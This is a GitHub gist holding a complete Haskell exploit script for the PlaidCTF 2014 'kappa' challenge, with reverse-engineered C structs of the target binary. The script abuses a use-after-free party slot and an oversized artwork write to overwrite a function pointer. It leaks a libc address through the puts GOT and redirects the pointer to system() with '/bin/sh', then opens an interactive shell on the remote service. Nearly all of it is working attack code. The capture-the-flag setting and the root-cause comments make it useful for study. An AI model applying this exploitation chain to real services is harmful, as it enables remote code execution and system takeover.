@Tosainu
Last active September 23, 2017 13:14
#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc --package pwn
-- PlaidCTF 2014: kappa
-- https://github.com/ctfs/write-ups-2014/tree/master/plaid-ctf-2014/kappa
-- tested env:
-- $ cat /etc/os-release
-- NAME="Ubuntu"
-- VERSION="16.04.3 LTS (Xenial Xerus)"
-- ...
--
-- $ sha1sum /lib/i386-linux-gnu/libc.so.6
-- 4fbb4b71ac6585eb0fa8f60b902a39f29da3fd34 /lib/i386-linux-gnu/libc.so.6
{-# LANGUAGE OverloadedStrings #-}
import Control.Monad
import Data.Bits
import qualified Data.ByteString.Char8 as BS
import Data.Maybe
import Data.Monoid ((<>))
import Numeric (showHex)
-- https://github.com/Tosainu/pwn.hs
import Pwn
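-- | Drive the kappa service end to end: build a party, trigger the release
-- bug, leak a libc pointer through a corrupted attack field and finally
-- redirect a print_info function pointer to libc's system().
--
-- Root cause, as far as the notes in this gist show: releasing a Pokemon
-- leaves a stale entry in the party list ("UAF?" at 0x080491b9), and the
-- artwork write is sized for the largest layout (0x850 bytes) while the
-- object later reached through slot 5 is handled with the Kakuna layout,
-- whose health/power/attack/print_info fields sit at +0x204..+0x210, well
-- inside that write.  Clearing the slot on release, or bounding the artwork
-- write by the object's actual layout, would each break the chain.  The
-- hard-coded libc offsets below are only valid for the libc identified by
-- the sha1sum in the header comment.
main :: IO ()
main = do
  r <- remote "192.168.122.10" 4000

  let -- Wait for a menu prompt, then answer it with one option.
      choose prompt opt = recvuntil r prompt >> sendline r opt

      -- Build one artwork payload laid out for the Kakuna struct: filler up
      -- to the fields that follow the artwork buffer, then health, power,
      -- attack and print_info, then padding to the 0x850 bytes the artwork
      -- write expects.  Yields Nothing if any p32 fails instead of silently
      -- dropping a field and shifting every later one.
      artwork attack printInfo = do
        fields <- sequence
          [ p32 0xdeadbeef -- health
          , p32 0xdeadbeef -- power
          , p32 attack -- attack
          , p32 printInfo -- print_info
          ]
        let body = BS.replicate 0x1f5 'A' <> BS.concat fields
        pure $ body <> BS.replicate (0x850 - BS.length body) 'A'

      -- Turn a failed pack/unpack into an explicit error instead of an
      -- irrefutable-pattern crash.
      orFail what = maybe (fail ("kappa: " <> what)) pure

  info "find Kakuna x4"
  forM_ ["foo", "bar", "baz", "qux"] $ \name -> do
    choose "5. Change Pokemon artwork\n\n" "1" -- 1. Go into the Grass
    choose "5. Change Pokemon artwork\n\n" "1" -- 1. Go into the Grass
    choose "3. Run\n" "2" -- 2. Throw Pokeball
    recvuntil r "What would you like to name this Pokemon?\n"
    send r name
    success $ " caught a Kakuna: " <> BS.unpack name

  info "release 1st Kakuna"
  choose "5. Change Pokemon artwork\n\n" "4" -- 4. Release a Pokemon
  choose "5. qux\n" "2"
  -- Pokemon list: ["Bird Jesus", "bar", "baz", "qux", "qux"]
  --                                              ↑
  -- the 5th entry is presumably the stale pointer left behind by the
  -- release (see the "UAF?" note)

  info "find Kakuna"
  choose "5. Change Pokemon artwork\n\n" "1" -- 1. Go into the Grass
  choose "5. Change Pokemon artwork\n\n" "1" -- 1. Go into the Grass
  -- A wild Kakuna appears!
  choose "3. Run\n" "2" -- 2. Throw Pokeball
  recvuntil r "What would you like to name this Pokemon?\n"
  send r "foo2"
  choose "5. qux\n" "5" -- put it in the stale slot
  success " caught a Kakuna: foo2"

  info "find Charizard"
  choose "5. Change Pokemon artwork\n\n" "1" -- 1. Go into the Grass
  choose "5. Change Pokemon artwork\n\n" "1" -- 1. Go into the Grass
  -- A wild Kakuna appears!
  choose "3. Run\n" "3" -- 3. Run
  info " found a Kakuna but released it"
  choose "5. Change Pokemon artwork\n\n" "1" -- 1. Go into the Grass
  replicateM_ 4 $ choose "3. Run\n" "1" -- 1. Attack
  choose "3. Run\n" "2" -- 2. Throw Pokeball
  recvuntil r "What would you like to name this Pokemon?\n"
  -- the name is the first field of the object, so whatever print_info is
  -- later pointed at receives "/bin/sh" as its argument
  send r "/bin/sh\x00"
  choose "5. foo2\n" "5"
  success " caught a Charizard: /bin/sh"

  info "leak informations"
  -- [0x08049284]> pd 3 @ sym.imp.puts
  -- ┌ (fcn) sym.imp.puts 6
  -- │ sym.imp.puts ();
  -- │ | 0x08048590 ff25d4ae0408 jmp dword [reloc.puts_212] ; 0x804aed4
  -- | 0x08048596 6840000000 push 0x40 ; '@' ; '@'
  -- └─< 0x0804859b e960ffffff jmp 0x8048500 ; fcn.80484fe+0x2
  --
  -- 0x08048592 is the immediate inside the PLT jmp above, i.e. the address
  -- of the puts GOT entry; the binary is not position independent, so these
  -- addresses are fixed.
  let puts_got_ptr = 0x08048592
      print_kakuna_info = 0x08048766
      libc_puts' = 0x0005fca0
      libc_system' = 0x0003ada0
  leakPayload <- orFail "p32 failed while building the leak payload" $
    artwork puts_got_ptr print_kakuna_info
  choose "5. Change Pokemon artwork\n\n" "5" -- 5. Change Pokemon artwork
  choose "5. /bin/sh\n" "5"
  send r leakPayload
  choose "5. Change Pokemon artwork\n\n" "3" -- 3. Inpect your Pokemon
  recvuntil r "Name: /bin/sh\n"
  recvuntil r "Attack: "
  leak <- recvn r 4
  libc_puts <- orFail "u32 failed on the leaked attack pointer" (u32 leak)
  let libc_base = libc_puts - libc_puts'
  success $ " libc_base: 0x" <> showHex libc_base ""

  info "execute '/bin/sh'"
  shellPayload <- orFail "p32 failed while building the system() payload" $
    artwork 0xdeadbeef (libc_base + libc_system')
  choose "5. Change Pokemon artwork\n\n" "5" -- 5. Change Pokemon artwork
  choose "5. /bin/sh\n" "5"
  send r shellPayload
  choose "5. Change Pokemon artwork\n\n" "3" -- 3. Inpect your Pokemon
  recvuntil r "Name: baz\n"
  recvuntil r "Attack: Tackle\n"
  interactive r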
// Reverse-engineered globals of the kappa binary (offsets and sizes taken
// from the notes in this gist): five party slots and a parallel type tag per
// slot.  NOTE(review): the exploit appears to rely on a released slot's
// pointer not being cleared here (see the "UAF?" note below); confirm
// against the binary.
void* pokemons[5];
uint32_t pokemon_types[5];
// Charizard layout as reconstructed from the binary.  Field comments give
// the offset from the object start and the value seen on a fresh capture.
// The offsets imply one byte of alignment padding between artwork and
// health (0xf + 0x868 = 0x877, health at +0x878).
struct pokemon1 {
char name[0xf]; // +0x000 "Charizard"
char artwork[0x868]; // +0x00f; strlen(buf) == 0x850 -- the artwork write is sized for this, the largest layout
uint32_t health; // +0x878 0x64
uint32_t power; // +0x87c 0xa
char** attack; // +0x880 "Blaze"
void(*print_info)(struct pokemon1*); // +0x884; takes the object pointer as its only argument, presumably invoked by the "Inspect" menu
};
// Kakuna layout.  The exploit's artwork payload is 0x1f5 filler bytes
// followed by four 32-bit fields: 0xf + 0x1f5 = 0x204, so an artwork write
// that starts at +0xf and is sized for pokemon1 (0x850 bytes) runs straight
// over health, power, attack and print_info of an object using this layout.
// As above, one byte of alignment padding sits between artwork and health.
struct pokemon2 {
char name[0xf]; // +0x000 "Kakuna"
char artwork[0x1f4]; // +0x00f
uint32_t health; // +0x204 0x14
uint32_t power; // +0x208 0x1
char** attack; // +0x20c "Tackle" -- dereferenced as a string pointer when printed; the leak stage points it at 0x08048592, whose bytes are the puts GOT address
void(*print_info)(struct pokemon2*); // +0x210 -- the function pointer the exploit overwrites (print_kakuna_info for the leak, then system())
};
// "Bird Jesus" layout (the Pokemon that appears to be in the party from the
// start, per the party list in the Haskell script).  Offsets again imply one
// padding byte before health (0xf + 0x5dc = 0x5eb, health at +0x5ec).
struct pokemon3 {
char name[0xf]; // +0x000 "Bird Jesus"
char artwork[0x5dc]; // +0x00f
uint32_t health; // +0x5ec 0x3e8
uint32_t power; // +0x5f0 0x14
char** attack; // +0x5f4 "Gust"
void(*print_info)(struct pokemon3*); // +0x5f8
};
// -------------------------------------------------------
0x080491b9: UAF?